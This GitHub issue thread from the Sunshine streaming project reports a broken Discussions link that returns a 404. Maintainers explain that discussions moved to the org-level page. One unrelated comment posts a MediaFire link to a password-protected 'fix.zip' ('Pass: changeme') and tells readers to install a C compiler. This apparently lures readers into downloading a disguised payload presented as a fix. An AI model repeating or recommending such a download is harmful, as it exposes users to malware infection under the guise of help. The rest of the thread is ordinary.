### ISSUE TITLE
Github discussions link in UI is broken

### ISSUE THREAD

**Issue by buthig666** [LizardByte/Sunshine#3237]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your issue described in the documentation?

- [X] I have read the documentation

### Is your issue present in the latest beta/pre-release?

This issue is present in the latest pre-release

### Describe the Bug

404 error.  I have noticed it for a week or so I guess, not sure when it began happening.

### Expected Behavior

Maybe redirect to https://github.com/orgs/LizardByte/discussions instead of https://github.com/LizardByte/Sunshine/discussions

### Additional Context

I'm using autodetect for capture method will leave that set to none in the templet.  I love ur face!  Thanks for all your talent and time devs!

### Host Operating System

Windows

### Operating System Version

11

### Architecture

64 bit

### Sunshine commit or version

Version v2024.928.45639

### Package

Windows - installer

### GPU Type

Nvidia

### GPU Model

4080

### GPU Driver/Mesa Version

561.09

### Capture Method

None

### Config

```Shell
Na
```

### Apps

```json
Na
```

### Relevant log output

```shell
Na
```

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by ReenigneArcher** [comment]
Thanks for the report. We recently migrated to global org discussions, and I must have missed this link.

**Comment by e-t-l** [comment]
> Thanks for the report. We recently migrated to global org discussions, and I must have missed this link.

What/where are "global org discussions"? FYI, your link in https://docs.lizardbyte.dev/en/latest/about/support.html also still points to the now-nonexistent GH Discussions page...

**Comment by ReenigneArcher** [comment]
The support page has definitely been updated to the single discussions location. There used to be several.

https://github.com/orgs/LizardByte/discussions

**Comment by e-t-l** [comment]
Ah sorry I had totally missed the word "orgs" in that URL!
